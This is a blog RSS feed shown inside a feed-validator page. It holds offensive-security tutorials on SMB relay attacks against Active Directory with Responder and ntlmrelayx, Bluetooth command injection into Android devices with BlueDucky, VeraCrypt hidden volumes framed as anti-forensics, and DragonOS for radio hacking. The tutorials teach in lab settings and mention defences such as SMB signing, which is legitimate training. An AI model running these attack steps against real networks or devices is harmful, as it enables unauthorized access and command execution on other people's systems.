FEED Validator

for Atom and RSS and KML

Congratulations!

This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

line 687, column 488: title should not contain HTML: & (3 occurrences) [help]

... Part III (Installing your Redirector)]]></title><description><![CDATA[In ...
                                             ^

line 818, column 16: content:encoded should not contain relative URL references: www.hackers-arise.com/subscriber-pro (4 occurrences) [help]

<p><br /></p>]]></content:encoded></item><item><title><![CDATA[The Return of ...
                ^

Source: https://www.hackers-arise.com/blog-feed.xml

<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Hackers Arise]]></title><description><![CDATA[hackers-arise]]></description><link>https://www.hackers-arise.com</link><generator>RSS for Node</generator><lastBuildDate>Thu, 25 Apr 2024 19:17:44 GMT</lastBuildDate><atom:link href="https://www.hackers-arise.com/blog-feed.xml" rel="self" type="application/rss+xml"/><item><title><![CDATA[Hackers-Arise Offers the Best Cybersecurity Training on the Planet! Hear What our Students are Saying!]]></title><description><![CDATA[Hackers-Arise Offers the Best Cybersecurity Training on the Planet! We attract superior students from around the globe! Don't take our...]]></description><link>https://www.hackers-arise.com/post/hackers-arise-offers-the-best-cybersecurity-training-on-the-planet</link><guid isPermaLink="false">6628655e9c879718b7a0e14c</guid><pubDate>Wed, 24 Apr 2024 19:12:18 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_e98dd10ae25d4291b4a260ea4c45c1b8~mv2.jpeg/v1/fit/w_600,h_200,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[Hackers-Arise Offers the Best Cybersecurity Training on the Planet!
 
We attract superior students from around the globe! 
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_3fee0d8e389949aca1d82109872c36b6~mv2.jpg/v1/fit/w_572,h_171,al_c,q_80/file.png"></figure>
 
 
Don't take our word for it, look what are students are saying! These are all unsolicited testimonials from real people!
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_9c01278c0ff749938ad2245b538729f2~mv2.png/v1/fit/w_627,h_813,al_c,q_80/file.png"></figure>
 
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_ca6d22a24eec43949720008cb8547854~mv2.png/v1/fit/w_617,h_794,al_c,q_80/file.png"></figure>
 
 
 
To participate in this state-of-the art training, we offer multiple training packages. One for nearly every budget and every skill level, such as:
 
Member Gold- This is a monthly program where you can study online all of the over 30 courses in the Subscriber package.
 
Subscriber- This is our most popular program. You can attend live trainings by Master OTW and study previous courses in the Subscriber package online. These courses are for those in the beginner to intermediate level.
 
Subscriber Pro- This is our ultimate package. It includes all the courses here at Hackers-Arise and includes our advanced and specialty courses such as Satellite Hacking, SCADA Hacking, IoT Hacking, IP Camera Hacking, Bitcoin Forensics and many more!
 
For more on our many training packages and Subscriptions, <a href="https://hackers-arise.net/training/" rel="noreferrer" target="_blank">click here.</a>]]></content:encoded></item><item><title><![CDATA[Hacking Active Directory]]></title><description><![CDATA[Agent, your mission—code-named "Digital Lockpick"—is set within the cyber walls of Active Directory, the nexus of network security. Your...]]></description><link>https://www.hackers-arise.com/post/hacking-active-directory</link><guid isPermaLink="false">6621071c4a2590524763432c</guid><pubDate>Mon, 22 Apr 2024 18:16:08 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_47b8a8422c154a638dae07acd5b94c36~mv2.png/v1/fit/w_1000,h_1000,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
<figure><img src="https://static.wixstatic.com/media/6a4a49_47b8a8422c154a638dae07acd5b94c36~mv2.png/v1/fit/w_1000,h_1000,al_c,q_80/file.png"></figure>
 
Agent, your mission—code-named "Digital Lockpick"—is set within the cyber walls of Active Directory, the nexus of network security. Your mission, should you choose to accept it: to exploit the Server Message Block (SMB) protocol, a seemingly innocuous yet vital pathway through which information travels.
 
This operation hinges on mastering the SMB Relay Attack, a tactic that will allow you to navigate through secured checkpoints without detection, bypassing traditional credentials. With Impacket as your toolkit and its -i switch as your master key, you'll be able to open doors that were never meant to be unlocked.
 
Expect resistance. The network is vigilant, and time is of the essence. Your skills in maneuvering through these digital corridors must be precise. The objective? To demonstrate the art of the possible and to expose the chinks in the armor of network security.
 
Setting up the stage for our SMB Relay Attack
 
Before diving into the mechanics of the attack, let's set up our virtual stage. Our lab consists of a modern setup with a Windows Server 2022 acting as the cornerstone of our Active Directory domain. Alongside it, we have two virtual machines—let's call them smouk1 and smouk2—both joined to the domain, mimicking a typical enterprise environment. Our attack platform is a Kali Linux machine, strategically positioned within the same network to interact directly with these Windows entities.
 
Introducing the Responder tool
 
To kick things off, we'll start with a critical tool in our arsenal: Responder For those unfamiliar, Responder is a powerful network tool for protocol analysis and network forensics. It's especially notorious for its ability to listen to network traffic and respond to service requests such as LLMNR, NBT-NS, and MDNS, which are often used as a fallback when DNS fails. By doing so, it can poison the service request and redirect the traffic to the attacker’s machine, essentially enabling us to intercept or manipulate these communications.
In our scenario, we’ll launch Responder with a specific set of options to maximize its effectiveness:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_88ce5bb4ddfa4a2fa489392e491acf0a~mv2.png/v1/fit/w_606,h_128,al_c,q_80/file.png"></figure>
 
Here’s what each switch means:
<ul>
<li>-I eth0: Specifies the network interface to listen on, which is eth0 in our case. This should be adapted if your network interface has a different name.</li>
<li>-d: Enables SMB and HTTP server functionalities, critical for the types of attacks we’re focusing on.</li>
<li>-P: Enables Responder's proxy functionalities, allowing it to forward traffic after manipulating it, providing a seamless yet deceptive flow.</li>
<li>-v: Runs Responder in verbose mode, giving us a detailed output of all the operations it’s performing, which is invaluable for understanding the attack’s progression in real-time.
</li>
</ul>
By setting up Responder this way, we're effectively preparing to intercept and manipulate the SMB communications, laying the groundwork for executing our SMB Relay Attack. This strategic use of Responder not only illustrates the vulnerabilities present in network configurations but also underscores the importance of securing network protocols against such intrusions, also make sure that SMB and HTTP options are turned off.
 
Launching the attack with Impacket's-ntlmrelayx
 
With Responder quietly laying the groundwork by capturing traffic, the next step is to introduce a more direct attack tool—Impacket's-ntlmrelayx. This tool is designed to perform the actual SMB Relay Attack by relaying NTLM authentication sessions and attempting unauthorized access to the network resources.
 
How ntlmrelayx fits into our strategy
 
Once we've intercepted the authentication requests with Responder, ntlmrelayx takes the baton and uses those credentials to gain unauthorized access. To set this up in our lab environment, we use the following command:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_685823f652ec42d29312cf22fdea28da~mv2.png/v1/fit/w_1000,h_64,al_c,q_80/file.png"></figure>
 
Here’s the breakdown of the command options:
<ul>
<li>-tf iptargets.txt: This option tells ntlmrelayx where to find the list of target IP addresses. In our case, iptargets.txt contains the IPs of our Windows Server 2022 and the two domain-joined VMs.</li>
<li>-smb2support: Enables the tool to support SMB2, which is crucial given the modern Windows environments we are dealing with that likely use SMB2 or SMB3 by default.</li>
<li>-i: This critical switch initiates an interactive SMB shell on successful relay, allowing us to execute commands directly on the target system.</li>
</ul>
 
Using ntlmrelayx with these parameters allows us to not just authenticate as the intercepted user but also to interact with the compromised system as if we were legitimately logged in. This can be incredibly powerful and dangerous, providing direct access to execute commands, deploy payloads, or even create new user accounts for persistent access.
 
This step is where theory meets practice, and we see the real-time effects of how intercepted credentials can be leveraged to breach network defenses. It's a potent demonstration of why network security measures, such as SMB Signing and proper network segmentation, are crucial for protecting against such sophisticated attacks.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_17fcbbb5642549d59376949f0ffb50e0~mv2.png/v1/fit/w_749,h_501,al_c,q_80/file.png"></figure>
 
 
Upon launching ntlmrelayx with our targeted approach, the screen comes alive with confirmation of our preparatory steps. The output indicates that various protocol clients have been successfully loaded, including those for SMB, HTTP(S), LDAP(S), and more. These are the tools of the trade for ntlmrelayx, each representing a different method of communication that the tool can exploit.
 
The line "Running in relay mode to hosts in targetfile" is especially significant. It means our relay setup is armed and active, ready to intercept any authentication request sent to the IPs listed in our iptargets.txt file.
 
With services for HTTP and SMB set up and listening, and a RAW Server waiting on port 6666, our digital trap is set. We’re effectively standing by, waiting for network conversations to eavesdrop on or hijack—this is the hacker's stakeout. The simplicity of the output belies the complexity and potential impact of what's happening under the hood: we've created a multifaceted surveillance system that's waiting for the opportune moment to strike.
 
As we see the final message, "Servers started, waiting for connections," the anticipation builds. We are now in the critical phase of the attack, where any moment could lead to the breakthrough we need to access the targeted systems. This is where patience pays off in the world of network penetration testing.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_f289dcf6d45d4113a4a2e3e6f1c81a43~mv2.png/v1/fit/w_1000,h_994,al_c,q_80/file.png"></figure>
 
 
The moment of truth: attack execution and user interaction
 
As the user on the network reaches out to a shared resource, a login prompt stands guard, denying entry to the digital trove. Little do they know, this routine action triggers a cascade within our attack framework. The terminal on the left springs to life, logging each step of our orchestrated ambush—Responder springs its trap, capturing the query, and poisoning the network’s attempts at resolution.
 
The symphony of protocols listed confirms the preparedness of our tools, from IMAP to LDAP, ready to impersonate and deceive. As Responder lays the false tracks, ntlmrelayx waits in the shadows, primed for action. Suddenly, the connection is made—our target unwittingly shakes hands with the enemy, and the attack sequence initiates. Success and failure messages flicker in real-time; this is the ebb and flow of cyber combat.
 
In the face of an 'Access Denied' prompt, the real drama unfolds out of sight, recorded in the logs of our Kali machine. Here, every attempt is a potential key to the kingdom. Each "Authenticating against" line is a narrative of siege warfare, as ntlmrelayx relentlessly probes for a chink in the armor.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_4c9ddfd358e44e90992b2d43288235de~mv2.png/v1/fit/w_931,h_272,al_c,q_80/file.png"></figure>
 
As the digital dust settles from the initial engagement, we open a new line of communication on our attacker machine—a command line interface that serves as the gateway to our newly compromised domain. By executing nc 127.0.0.1 11000, we invoke Netcat, the network utility dubbed the Swiss Army knife of networking, to connect to a local port opened by the ntlmrelayx attack.
 
This simple, yet powerful command, nc (Netcat), followed by the loopback address 127.0.0.1 and port 11000, is our secret knock on the backdoor we've just installed. The prompt that follows, "Type help for list of commands", is the whisper of a hidden world now at our fingertips. We are in—inside a shell that grants us the power to commandeer the target system.
 
The # symbol at the command prompt is the new ground zero, from where we can launch further reconnaissance, escalate privileges, or exfiltrate data, all depending on the commands we choose to execute next. This is the culmination of our SMB Relay Attack, where we step through the looking glass into the heart of the target system, poised to explore the secrets it holds.
 
 
Conclusion and a technical debrief on the SMB Relay attack
 
Setting aside the playful spirit of the narrative, aspiring hackers, pentesters, red teamers, and even blue teamers must grasp the essence of what we've accomplished here. We commenced with a controlled lab setup, using a Windows Server 2022 and two VMs within an Active Directory domain, along with our attack platform, a Kali Linux machine.
 
Utilizing the Responder tool, we initiated the first phase by capturing network traffic and exploiting the trust of fallback protocols like LLMNR and NBT-NS, leading to the poisoning of these service requests. This step is crucial as it allows for the interception of NTLM authentication attempts.
 
Following this setup, we introduced the ntlmrelayx utility from the Impacket suite to execute the relay attack. The command-line flags were meticulously chosen: -tf to target a predefined list of IP addresses, -smb2support to enable compatibility with the prevalent SMB protocol version in modern systems, and -i to trigger an interactive shell upon successful exploitation.
 
As the user on the target network attempted to access a shared resource, our interception techniques via Responder manipulated the network traffic, redirecting the authentication process to our attacker-controlled machine. With ntlmrelayx, these intercepted credentials were then used to authenticate against the target, allowing us to gain unauthorized access.
 
The terminal output displayed the status of our engagement, capturing the to-and-fro of network requests and the attempts at relayed authentication — a testament to the potency of our strategy. Upon achieving a successful relay, we utilized Netcat to connect to the listening port established by ntlmrelayx, granting us an interactive command shell on the target system. This access marked the culmination of the attack, providing us the capability to execute arbitrary commands within the compromised environment.
 
This exercise illustrates the vulnerability of network protocols and the importance of securing them against such intrusions. It also highlights the necessity for rigorous security measures, like enforcing SMB signing and educating network users to prevent credential interception and relay attacks. As you reflect on this operation, remember that the true strength of a cybersecurity professional lies not only in understanding how to execute these attacks but also in applying this knowledge to defend and secure networks against potential threats.
 
Smouk out!
<a href="https://twitter.com/IamSmouk" rel="noreferrer" target="_blank">Follow me on X</a>
 
If you want to learn more about Hacking Active Directory take a look at our brand new course <a href="https://hackersarise.thinkific.com/courses/active-directory-for-hackers" target="_blank">Active Directory for Hackers</a> part of our <a href="https://hackersarise.thinkific.com/bundles/subscriber" target="_blank">Subscriber </a>Training Level.
]]></content:encoded></item><item><title><![CDATA[Anti-Forensics: Using Veracrypt to Hide Your Most Sensitive Data]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! In our industry, we often carry around some very valuable and sensitive data. This might include...]]></description><link>https://www.hackers-arise.com/post/anti-forensics-using-veracrypt-to-hide-your-most-sensitive-data</link><guid isPermaLink="false">661e9c4cad2035ff880cea8c</guid><pubDate>Wed, 17 Apr 2024 15:21:54 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_60ccc257ae824d908efb7832cee7d587~mv2.jpg/v1/fit/w_275,h_183,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
Welcome back, my aspiring cyberwarriors!
 
In our industry, we often carry around some very valuable and sensitive data. This might include a bug bounty technique, a zero-day, future plans in our cyberwar, or simply confidential information on our family and friends that they have shared with us. It is critical that this information not fall into the wrong hands if our laptop is stolen or misplaced.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_60ccc257ae824d908efb7832cee7d587~mv2.jpg/v1/fit/w_275,h_183,al_c,q_80/file.png"></figure>
 
 
As you know, a password protected operating system will not protect your data from a skilled investigator. Data on your hard drive can be accessed using a live boot forensic operating system or simply removing your hard drive from the system and copying the key clusters.
 
To keep your data safe, you need to encrypt your data on your hard drive. although both Apple and Microsoft offer data encryption applications both companies have shown themselves to be untrustworthy guardians of your data. Let's use an open-source application with a good track record and not beholden to some untrustworthy corporate behemoth who will sell your data to the highest bidder.
 
Once there was an application known as TrueCrypt that was open-source and successful in keeping your data safe. Unfortunately, the developers discontinued support of this product. Fortunately for us, another group of developers forked TrueCrypt to another product they called VeraCrypt.
 
VeraCrypt is a software utility used for on-the-fly encryption (OTFE). It's a fork of the discontinued TrueCrypt project, which means it was developed based on TrueCrypt's source code but with additional improvements and security enhancements. VeraCrypt can create a virtual encrypted disk within a file or encrypt a partition or the entire storage device with pre-boot authentication.
 
Some of the key features of VeraCrypt include:
<ol>
<li>Enhanced Security: VeraCrypt uses more robust encryption algorithms and more complex key derivation procedures than TrueCrypt. This makes it more resistant to brute-force attacks.</li>
<li>Encryption: It supports various encryption algorithms, including AES, Serpent, and Twofish, and combinations of these.</li>
<li>Cross-Platform: VeraCrypt is available for Windows, macOS, and Linux, making it versatile for different user environments.</li>
<li>Hidden Volumes: It can create a hidden volume within another volume. This feature allows plausible deniability, where even if forced to reveal a password, the hidden volume's existence can remain undisclosed.</li>
</ol>
 
Let's download and test Veracrypt!
 
<h2>Step #1 Download and Install Veracrypt</h2>
<h2></h2>
In this tutorial, I will be downloading and installing Veracrypt to my Kali Linux system, but the instructions are nearly identical for use with the MacOS and Windows.
 
You can download veracrypt here.
 
<a href="https://www.veracrypt.fr/en/Downloads.html" target="_blank">https://www.veracrypt.fr/en/Downloads.html</a>
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_ce3b956dc89a4e998e2ab2d8b471d73a~mv2.png/v1/fit/w_1000,h_624,al_c,q_80/file.png"></figure>
 
I have indicated the package I used for my 64-bit Kali Linux in the image above, but if you are using MacOS or Windows, make certain to download the appropriate package.
 
Once the application has completely downloaded, you will need to unpack the compressed application. In Kali, the default archive manager is Engrampa and it will automatically open when your application completes its download. Simply click on the Extract button and Engrampa with uncompress your file.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_d883a5f983ba440f84d9412cd59f0169~mv2.png/v1/fit/w_772,h_533,al_c,q_80/file.png"></figure>
 
Now, go ahead and click the Extract button.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_16169febf6c94265813e5569cde48bfd~mv2.png/v1/fit/w_772,h_436,al_c,q_80/file.png"></figure>
 
 
You should now have several versions of Veracrypt in your Downloads directory. I am using the veracrypt-1.26.7-setup-gui-x64 on my Kali.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_443191fdd5454e588f3fbe2db81741f1~mv2.png/v1/fit/w_463,h_103,al_c,q_80/file.png"></figure>
 
<h2>Step # 2 Install and Enable Veracrypt</h2>
 
 
Once you have executed the setup script, you should be greeted then by a screen such as seen below asking you to select an installation option. I selected 1.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_5df29203e6a141bbab9ba7ff6a45a0f9~mv2.png/v1/fit/w_790,h_271,al_c,q_80/file.png"></figure>
 
Once you enter 1, the application will ask you to read and agree to all the End User agreement. When you agree, Veracrypt will run it's script and install all of its components.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_f2aac31cd2ad4c7f9198ab91b402d5a2~mv2.png/v1/fit/w_749,h_479,al_c,q_80/file.png"></figure>
 
Now, you only need to enter the command "veracrypt".
 
kali > veracrypt
 
This should open a window like that below.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_d369a19bb25b4e90aec8cf6a83bed4d9~mv2.png/v1/fit/w_800,h_693,al_c,q_80/file.png"></figure>
 
Select "Create Volume".
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_786487a42eda41b29aae0ffb6aac9196~mv2.png/v1/fit/w_1000,h_598,al_c,q_80/file.png"></figure>
 
Next, select "Create an encrypted file container".
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_abc17577edc1477d9485fac9deb624cc~mv2.png/v1/fit/w_1000,h_677,al_c,q_80/file.png"></figure>
 
At this point, you can choose to create a standard Veracrypt volume or a Hidden Veracrypt volume. For extra security, I selected the hidden volume.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_50eef43f8e6f4624a8d1e656a385b7e0~mv2.png/v1/fit/w_1000,h_724,al_c,q_80/file.png"></figure>
 
Now, we are asked what type of encryption to use to encrypt the volume. AES is the default, but there are many other choices including nested encryption by 2 or 3 encryption algorithms. In this case, the data is first encrypted with one type of encryption and then the encrypted data is encrypted again with a different encryption algorithm. This makes it VERY difficult for anyone to decipher the data but it also adds latency to the availability of the data since the data must go through multiple rounds of encryption. I only use these nested encryption for my most sensitive data.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_15d0ffdc67e84db480e3cdc00cd95a08~mv2.png/v1/fit/w_885,h_582,al_c,q_80/file.png"></figure>
 
Once you have selected your encryption algorithm, you will be asked for the size of the volume.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_0df1c5ffb3f84a4da5dc04bb3d745a6a~mv2.png/v1/fit/w_1000,h_589,al_c,q_80/file.png"></figure>
Finally, you will be asked for your password. Make certain it is long and complex to prevent brute force attacks.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_f9a718d791234cb2a3a3c3639a218783~mv2.png/v1/fit/w_1000,h_593,al_c,q_80/file.png"></figure>
 
At this stage, you are asked whether you will be encrypting very large files. If you are encrypting files over 4gb, you file system choices are limited.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_dcc9a6cd509147a5bfef803a60226c58~mv2.png/v1/fit/w_996,h_599,al_c,q_80/file.png"></figure>
 
Now, we choose the type of file system. In my case, I selected FAT as it can be read by multiple operating systems but can not store files larger than 4gb.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_36e8a4ff9565406d97c43d90e8568c01~mv2.png/v1/fit/w_1000,h_597,al_c,q_80/file.png"></figure>
 
At this point, we need to provide the encryption algorithm some random data. It's important that this data be truly random (rather than pseudo-random such as random number generators in some applications) to make the data as secure as possible. Veracrypt uses your random mouse movements to generator these random numbers for the algorithm.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_43b87db0bd924fb2a8eed92b345db857~mv2.png/v1/fit/w_1000,h_592,al_c,q_80/file.png"></figure>
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_d9b6c576abb7440eb0d8ec47c9e45724~mv2.png/v1/fit/w_1000,h_620,al_c,q_80/file.png"></figure>
 
Once you have completed the random number generation, Veracrypt will create your encrypted volume.
 
<h2>Step # 3 Open the Encrypted Volume</h2>
 
Now, when you want access to the encrypted volume, simply double click on the icon and this window will pop up requesting your password. Make certain to enter your password correctly and the data will available to you and only you!
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_ec601535c9024ce1bac2bc3cc40575fd~mv2.png/v1/fit/w_646,h_337,al_c,q_80/file.png"></figure>
 
<h2> Summary</h2>
 
In many cases, cyberwarriors must make certain that their data is secure. Personal data, corporate data, military plans and strategies can all be compromised by malicious actors or corporate data security plans that are compromised or simply insecure. A tool such as Veracrypt can secure our data even in the case of a stolen laptop or a sophisticated forensics investigator.
]]></content:encoded></item><item><title><![CDATA[Bluetooth Hacking: Injecting Commands into a Bluetooth Device with BlueDucky]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! Bluetooth is a nearly ubiquitous protocol used to communicate between devices in close proximity...]]></description><link>https://www.hackers-arise.com/post/bluetooth-hacking-injecting-commands-into-a-bluetooth-device-with-blueducky</link><guid isPermaLink="false">660d9c2040b97f566baa7ab1</guid><pubDate>Thu, 04 Apr 2024 20:49:54 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_9f4b6b932a6f4de2aa9560e2d35a5a54~mv2.png/v1/fit/w_574,h_553,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[Welcome back, my aspiring cyberwarriors!
 
Bluetooth is a nearly ubiquitous protocol used to communicate between devices in close proximity or a piconet, such as speakers, headphones, and cellphones. If an attacker can exploit Bluetooth, it may be able to take control of or eavesdrop on any of these devices.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_9f4b6b932a6f4de2aa9560e2d35a5a54~mv2.png/v1/fit/w_574,h_553,al_c,q_80/file.png"></figure>
 
There are numerous classes of Bluetooth devices. These different classes are announced to the connecting device in the banner. In previous Bluetooth tutorials here, we have discussed probably the most important class for exploiting Bluetooth devices, the HID class. This class of devices are known as Human Interface Devices and include such things as Bluetooth mice and keyboards. These are the devices that are allowed to send inputs to the Bluetooth-enabled device necessary for keyboards and mice to function properly.
 
In 2023, a new vulnerability was discovered in Bluetooth that may allow an unauthenticated HID Device to initiate and establish an encrypted connection. If this happens, the HID device may be able to inject commands into the device. This exploit works against unpatched Android 11 and later devices and any Android 10 and earlier device, as there is no patch presently available for these devices. A Proof Of Concept or POC was released in January 2024 and was recently integrated into a new tool known as BlueDucky.
 
Let's take a look at this tool and see what it can do.
 
 
<h2>Step # 1 Download and Install BlueDucky</h2>
 
To install BlueDucky, we need to do a few things to get our system ready.
 
First, update your apt cache.
 
 kali > sudo apt update 
 
Next, install the necessary dependencies from the Kali repository.
 
kali > sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev git gcc python3-pip python3-setuptools python3-pydbus
 
We n0w need to get bluez from <a href="http://github.com" target="_blank">github.com</a>. If you have done my previous tutorials on bluetooth, you likely already have this.
 
kali > git clone <a href="https://github.com/pybluez/pybluez.git" target="_blank">https://github.com/pybluez/pybluez.git</a>
 
Now, move into the new directory, pybluez.
 
kali > cd pybluez
 
We now need to run the setup script for bluez
 
kali > python3<a href="http://python3setup.py" target="_blank"> </a><a href="http://setup.py" target="_blank">setup.py</a> install
 
Next, we need to build bdaddr from source. bdaddr enables us to query or set the local Bluetooth device address.
 
kali > cd ~
 
kali > git clone --depth=1 https://github.com/bluez/bluez.git 
 
kali > gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
 
Now, let copy bdaddr to our local binary directory (/usr/local/bin) so that we can use it in our script from anywhere (/usr/local/bin is in the Linux $PATH variable).
 
kali > sudo cp bdaddr /usr/local/bin
 
Finally, we should download BlueDucky from github.
 
kali > git clone <a href="https://github.com/pentestfunctions/BlueDucky.git" target="_blank">https://github.com/pentestfunctions/BlueDucky.git</a>
 
kali > cd BlueDucky
 
kali > sudo hciconfig hci0 up
 
<h2>Step # 2 Run BlueDucky</h2>
 
Now that we have all of the elements necessary to run BlueDucky installed, let's try running it. If you are running it from a system with an external plug-in bluetooth adapter as I am, you will likely need to make a small change to the python script. BlueDucky, by default, uses hci0 to scan for Bluetooth devices. If you added an external bluetooth device, it will likely be recognized as hci1. We can remedy this by simply opening the script in your favorite text editor and changing the default value to hci1. Here I have used the default GUI text editor in Kali, mousepad.
 
kali > sudo mousepad <a href="http://BlueDucky.py" target="_blank">BlueDucky.py</a>
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_03ae1c4d249e4e99aaefe96596d34784~mv2.png/v1/fit/w_643,h_486,al_c,q_80/file.png"></figure>
 
Now, go ahead and save this file. Make certain to give yourself execute permissions.
 
kali > sudo chmod 755 <a href="http://BlueDucky.py" target="_blank">BlueDucky.py</a>
 
It's a good idea now to check to make certain your bluetooth adapter is up and activated.
 
kali > hciconfig hci1 up
 
If your adapter is up and running, it's time to start BlueDucky!
 
kali > sudo python3 <a href="http://BlueDucky.py" target="_blank">BlueDucky.py</a>
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_3682ed1e4500480dbb7db9799c2aa629~mv2.png/v1/fit/w_593,h_600,al_c,q_80/file.png"></figure>
 
If you know the MAC address of the device, you can enter it here. If not, simply hit ENTER and BlueDucky will scan for available MAC addresses.
 
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_77ee0c418edc4a61937fc851c6bf0e56~mv2.png/v1/fit/w_513,h_127,al_c,q_80/file.png"></figure>
 
At this point, you can select "yes"and enter the MAC address of the target device.
 
When you do so, BlueDucky will run through the requisite commands to compromise the device and if successful, will inject a "hello there 123" to the target device.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_b1588b454201464495c7294b0daa13f3~mv2.png/v1/fit/w_725,h_539,al_c,q_80/file.png"></figure>
 
 
<h2>Summary</h2>
 
Bluetooth enabled devices are all around us in our everyday life. These includes phones, tablets, speakers, headsets, keyboards and many other devices. Bluetooth devices declare the type of the device they are before pairing with another device. This is the class of the device. This class declaration can be manipulated by an attacker to inject commands into the device.
 
BlueDucky is an automated tool for exploiting this vulnerability and although the tool only sends an innocuous message to the target, it can easily be altered to send malicious commands into the target device such as "shutdown" or "rm -rf".
 
]]></content:encoded></item><item><title><![CDATA[SDR for Hackers: The DragonOS for Software Defined Radio]]></title><description><![CDATA[Welcome back, my aspiring radio hackers! Radio hacking using inexpensive SDR's is the state-of-the art in hacking. So many communication...]]></description><link>https://www.hackers-arise.com/post/sdr-for-hackers-the-dragonos-for-software-defined-radio</link><guid isPermaLink="false">63a32802c6b54ad327ac5506</guid><pubDate>Thu, 15 Feb 2024 22:45:39 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_b163e1b98ee24354baafabac329164dc~mv2.png/v1/fit/w_1000,h_826,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[Welcome back, my aspiring radio hackers!
 
Radio hacking using inexpensive SDR's is the state-of-the art in hacking. So many communication mediums using radio waves that the list could fill this tutorial but a few include;
 
<ol>
<li>Bluetooth</li>
<li>Cellular phones</li>
<li>Satellite phones</li>
<li>Wi-Fi</li>
<li>National defense and Police radio</li>
<li>Satellite communication</li>
<li>Remote controls</li>
<li>GPS</li>
<li>NFC</li>
<li>Automobile key fobs</li>
</ol>
 
 
...the list could go on and on.
 
Many of the tools in this field are open-source with a significant list of dependencies. This can mean hours of downloading and configuring applications and dependencies. Thankfully, we now have a operating system with nearly all the applications and dependencies pre-installed!
 
<h2>DragonOS</h2>
 
DragonOS is a custom Linux distribution designed for software-defined radio (SDR) enthusiasts and professionals. It comes pre-installed with a wide range of tools and software for SDR, such as GNU Radio, GQRX, and various other utilities for capturing, analyzing, and manipulating radio signals. DragonOS aims to provide a ready-to-use environment for SDR experimentation and research, without the need for extensive setup and configuration.
 
DragonOS is built upon Lubuntu, a fork of the Ubuntu Linux distribution.
<h2></h2>
<h2>Step 1: Downloading and Installing Dragon OS</h2>
 
DragonOS can be downloaded from Sourceforge at the following URL.
 
<a href="https://sourceforge.net/projects/dragonos-focal/" target="_blank">https://sourceforge.net/projects/dragonos-focal/</a>
 
Once the ISO download is complete, you can either install it on your baremetal computer or a virtual machine such Oracle's VirtualBox. When it is complete, it should look like the screenshot below.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_b163e1b98ee24354baafabac329164dc~mv2.png/v1/fit/w_1000,h_826,al_c,q_80/file.png"></figure>
 
 
 
<h2>Step#2 Navigating Dragon OS</h2>
 
DragonOS has a large number of SDR tools built-in. Most of these are already compiled and ready to use. Most importantly, many of the tools use specialized libraries for their functioning and these are installed as well (you can do all this yourself on you Ubuntu or Debian distribution but it can take many frustating hours).
 
The tools are available in two places on the menu system;
 
<ol>
<li>Other</li>
<li>Hamradio</li>
</ol>
 
When we navigate to the menu items, you can see the expanded list of SDR tools.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_e727d91e7a9646b3a528b8213df64f85~mv2.png/v1/fit/w_716,h_767,al_c,q_80/file.png"></figure>
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_7c09de4ddd15446a88cc2f5e68a267a2~mv2.png/v1/fit/w_654,h_787,al_c,q_80/file.png"></figure>
 
Just like other Ubuntu and Debian distributions, you can open a terminal and run the tools from a command-line. Nearly all of the tools are located at the /usr/src directory.
 
To see all of the software in one place, navigate to /usr/src such as;
 
live > cd /usr/src
 
live > ls 
 
